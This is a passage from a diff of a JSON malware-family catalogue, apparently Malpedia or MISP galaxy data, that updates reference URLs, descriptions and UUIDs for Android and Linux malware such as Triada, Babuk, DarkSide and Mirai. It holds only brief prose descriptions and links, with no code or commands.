"https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", - "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html", + "https://securelist.com/apkpure-android-app-store-infected/101845/", "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", + "https://securelist.com/triada-trojan-in-whatsapp-mod/103679/", "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/", "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", - "https://securelist.com/mobile-malware-evolution-2019/96280/", + "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html", "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", - "https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/" + "https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/", + "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [], "type": [] @@ -1932,11 +2240,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005", - "https://community.riskiq.com/article/6f60db72", - "https://twitter.com/voodoodahl1/status/1267571622732578816", - "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html", "https://s.tencent.com/research/report/951.html", - "https://blog.talosintelligence.com/2020/10/donot-firestarter.html" + "https://twitter.com/voodoodahl1/status/1267571622732578816", + "https://blog.talosintelligence.com/2020/10/donot-firestarter.html", + "https://community.riskiq.com/article/6f60db72", + "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html", + "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/" ], "synonyms": [], "type": [] @@ -1944,6 +2253,21 @@ "uuid": "084ebca7-91da-4d9c-8211-a18f358ac28b", "value": "Unidentified APK 005" }, + { + "description": "Information stealer posing as a fake banking app, targeting Korean users.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_006", + "https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20", + "https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/", + "https://twitter.com/ReBensk/status/1438027183490940931" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2263198d-af38-4e38-a7a8-4435d29d88e8", + "value": "Unidentified APK 006" + }, { "description": "Related to the micropsia windows malware and also sometimes named micropsia.", "meta": { @@ -1964,6 +2288,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat", + "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf", "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" ], @@ -1978,6 +2303,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex", + "https://www.justice.gov/usao-ndil/pr/federal-indictment-chicago-charges-turkish-national-directing-cyber-attack", + "https://therecord.media/turkish-national-charged-for-ddos-attacks-with-the-wirex-botnet/", "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/", "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/" ], @@ -2028,21 +2355,6 @@ "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", "value": "Xbot" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader", - "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/", - "https://securelist.com/roaming-mantis-part-v/96250/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "2ba6a2d9-c1c7-482a-b888-b2871c5c5e25", - "value": "XLoader" - }, { "description": "", "meta": { @@ -2138,10 +2450,12 @@ "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf", "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", "https://www.youtube.com/watch?v=GjquFKa4afU", "https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf", "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf" ], @@ -2186,8 +2500,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://twitter.com/IntezerLabs/status/1326880812344676352" + "https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/", + "https://twitter.com/IntezerLabs/status/1326880812344676352", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" ], "synonyms": [], "type": [] @@ -2229,10 +2544,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns", "https://www.netscout.com/blog/asert/dropping-anchor", - "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.domaintools.com/resources/blog/finding-anchordns-c2s-with-iris-investigate" ], "synonyms": [], "type": [] @@ -2269,6 +2587,25 @@ "uuid": "37374572-3346-4c00-abc9-9f6883c8866e", "value": "azazel" }, + { + "description": "ESX and NAS modules for Babuk ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk", + "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", + "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/", + "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", + "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", + "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d" + ], + "synonyms": [], + "type": [] + }, + "uuid": "26b4d805-890b-4767-9d9f-a08adeee1c96", + "value": "Babuk (ELF)" + }, { "description": "", "meta": { @@ -2292,7 +2629,11 @@ "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218", "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/" + "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt", + "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", + "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf" ], "synonyms": [ "Gafgyt", @@ -2319,6 +2660,21 @@ "uuid": "d8dd47a5-85fe-4f07-89dc-00301468d209", "value": "BCMPUPnP_Hunter" }, + { + "description": "Linux version of the bifrose malware that originally targeted Windows platform only. The backdoor has the ability to perform file management, start or end a process, or start a remote shell. The connection is encrypted using a modified RC4 algorithm.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bifrost", + "https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/" + ], + "synonyms": [ + "elf.bifrose" + ], + "type": [] + }, + "uuid": "8fa6dd0e-b630-419f-bd01-5271dd8f27c6", + "value": "Bifrost" + }, { "description": "A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.", "meta": { @@ -2332,6 +2688,41 @@ "uuid": "901ab128-2d23-41d7-a9e7-6a34e281804e", "value": "BigViktor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bioset", + "https://twitter.com/IntezerLabs/status/1409844721992749059" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8e301f58-acef-48e7-ad8b-c27d3ed38eed", + "value": "BioSet" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackmatter", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", + "https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/", + "https://blog.group-ib.com/blackmatter#", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", + "https://twitter.com/VK_Intel/status/1423188690126266370", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", + "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/", + "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", + "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1277a4bf-466c-40bc-b000-f55cbd0994a7", + "value": "BlackMatter (ELF)" + }, { "description": "", "meta": { @@ -2362,6 +2753,19 @@ "uuid": "57c9ab70-7133-441a-af66-10c0e4eb898b", "value": "Break out the Box" }, + { + "description": "XMRig-based mining malware written in Go.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.capoae", + "https://www.akamai.com/blog/security/capoae-malware-ramps-up-uses-multiple-vulnerabilities-and-tactics-to-spread" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c1b0528b-c674-4c76-8e1d-5846ba8af261", + "value": "Capoae" + }, { "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech", "meta": { @@ -2470,6 +2874,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", + "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/", "https://github.com/pooler/cpuminer" ], "synonyms": [], @@ -2516,6 +2921,24 @@ "uuid": "2e5e2a7e-4ee5-4954-9c92-e9b21649ae1b", "value": "Dacls (ELF)" }, + { + "description": "Mirai variant exploiting CVE-2021-20090 and CVE2021-35395 for spreading.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark", + "https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities", + "https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx", + "https://twitter.com/ESETresearch/status/1440052837820428298?s=20", + "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx" + ], + "synonyms": [ + "Dark.IoT" + ], + "type": [] + }, + "uuid": "d499e7ad-332f-4057-b31d-a69916408057", + "value": "Dark" + }, { "description": "", "meta": { @@ -2529,6 +2952,89 @@ "uuid": "dfba0c8f-9d06-448b-817e-6fffa1b22cb9", "value": "Dark Nexus" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.darkside", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin", + "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", + "https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9", + "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/", + "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access", + "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/", + "https://blog.group-ib.com/blackmatter#", + "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/", + "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/", + "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime", + "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/", + "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/", + "https://www.youtube.com/watch?v=qxPXxWMI2i4", + "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636", + "https://twitter.com/JAMESWT_MHT/status/1388301138437578757", + "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", + "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", + "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", + "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://pylos.co/2021/05/13/mind-the-air-gap/", + "https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212", + "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/", + "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b", + "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/", + "https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version", + "https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted" + ], + "synonyms": [], + "type": [] + }, + "uuid": "61796628-c37b-4284-9aa4-9f054cc6c3c2", + "value": "DarkSide (ELF)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark_radiation", + "https://www.sentinelone.com/blog/darkradiation-abusing-bash-for-linux-and-docker-container-ransomware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "39be337b-8a9a-4d71-949b-5efd6248fc80", + "value": "DarkRadiation" + }, + { + "description": "First activity observed in October 2017. DDG is a botnet with P2P capability that is targeting crypto currency mining (Monero).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddg", + "https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/", + "https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/", + "https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/", + "https://blog.netlab.360.com/ddg-botnet-round-x-is-there-an-ending/", + "https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5c42585b-ea92-4fe2-8a79-bb47a3df67ad", + "value": "DDG" + }, { "description": "", "meta": { @@ -2542,6 +3048,19 @@ "uuid": "07f48866-647c-46b0-a0d4-29c81ad488a8", "value": "ddoor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.derusbi", + "https://twitter.com/IntezerLabs/status/1407676522534735873?s=20" + ], + "synonyms": [], + "type": [] + }, + "uuid": "494dcdfb-88cb-456d-a95a-252ff10c0ba9", + "value": "Derusbi (ELF)" + }, { "description": "", "meta": { @@ -2578,6 +3097,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", "https://security.web.cern.ch/security/advisories/windigo/windigo.shtml", + "https://csirt.gov.it/data/cms/posts/582/attachments/66ca2e9a-68cd-4df5-81a2-674c31a699c2/download", "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", @@ -2638,12 +3158,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel", - "https://www.wired.com/story/sandworm-centreon-russia-hack/", + "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", "https://twitter.com/craiu/status/1361581668092493824", - "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf" + "https://www.wired.com/story/sandworm-centreon-russia-hack/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf" ], "synonyms": [], "type": [] @@ -2664,6 +3185,19 @@ "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", "value": "ext4" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.facefish", + "https://blog.netlab.360.com/ssh_stealer_facefish_en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "106487ea-a710-4546-bd62-bdbfa0b0447e", + "value": "Facefish" + }, { "description": "", "meta": { @@ -2686,6 +3220,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher", "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://securelist.com/finspy-unseen-findings/104322/", "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" ], "synonyms": [], @@ -2707,11 +3242,25 @@ "uuid": "ac30f2be-8153-4588-b29c-5e5863792930", "value": "floodor" }, + { + "description": "This family utilizes custom modules allowing for remote access, credential harvesting (e.g. by modifying sshd) and proxy usage.\r\n\r\nIt comes with a rootkit as well.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fontonlake", + "https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c530d62b-e49f-4ccf-9c87-d9f6c16617b7", + "value": "FontOnLake" + }, { "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" ], @@ -2773,6 +3322,19 @@ "uuid": "6aee7daf-9f63-4a70-bfe5-9c95cbdcb1e3", "value": "GreedyAntd" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.habitsrat", + "https://twitter.com/michalmalik/status/1435918937162715139" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e87e7f26-f2a1-437f-8650-312050e3cd48", + "value": "HabitsRAT (ELF)" + }, { "description": "", "meta": { @@ -2848,6 +3410,22 @@ "uuid": "db3e17f0-677b-4bdb-bc26-25e62a74673d", "value": "Hand of Thief" }, + { + "description": "Linux version of the HelloKitty ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hellokitty", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", + "https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html", + "https://www.bleepingcomputer.com/news/security/linux-version-of-hellokitty-ransomware-targets-vmware-esxi-servers/", + "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "785cadf7-5c99-40bc-b718-8a98d9aa90b7", + "value": "HelloKitty (ELF)" + }, { "description": "", "meta": { @@ -2885,6 +3463,19 @@ "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", "value": "Hide and Seek" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hubnr", + "https://github.com/carbreal/Malware_Analysis/tree/master/Hubnr_botnet" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c55389b0-e778-4cf9-9030-3d1efc1224c9", + "value": "Hubnr" + }, { "description": "", "meta": { @@ -2925,7 +3516,8 @@ "https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network", "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/" + "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf" ], "synonyms": [ "InterPlanetary Storm" @@ -2955,6 +3547,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji", "https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775", "https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/", "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/" ], @@ -2971,6 +3564,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf", "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html", + "https://www.lacework.com/the-kek-security-network/", "https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/" ], "synonyms": [ @@ -2998,6 +3592,19 @@ "uuid": "e3787d95-2595-449e-8cf9-90845a9b7444", "value": "kerberods" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kfos", + "https://twitter.com/r3dbU7z/status/1378564694462586880" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5e353bc2-4d32-409b-aeb6-c7df32607c56", + "value": "kfos" + }, { "description": "", "meta": { @@ -3008,9 +3615,11 @@ "https://redcanary.com/blog/kinsing-malware-citrix-saltstack/", "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces", "https://twitter.com/IntezerLabs/status/1259818964848386048", + "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775", "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743", "https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html", - "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" + "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability", + "https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html" ], "synonyms": [ "h2miner" @@ -3020,12 +3629,26 @@ "uuid": "ef0e3a56-e614-4dc1-bb20-0dcf7215c1ea", "value": "Kinsing" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kivars", + "https://www.trendmicro.com/en_us/research/16/c/threat-actors-behind-shrouded-crossbow-creates-bifrose-for-unix.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e8b24118-4ce8-471b-8683-1077a0f5f2a9", + "value": "KIVARS (ELF)" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos", "https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/", + "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf", "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf", "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/" ], @@ -3227,27 +3850,41 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", - "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", "http://osint.bambenekconsulting.com/feeds/", - "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet", - "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", - "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/", - "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", + "https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/", + "https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/", "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/", - "https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/", - "https://isc.sans.edu/diary/22786", - "https://github.com/jgamblin/Mirai-Source-Code", - "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", - 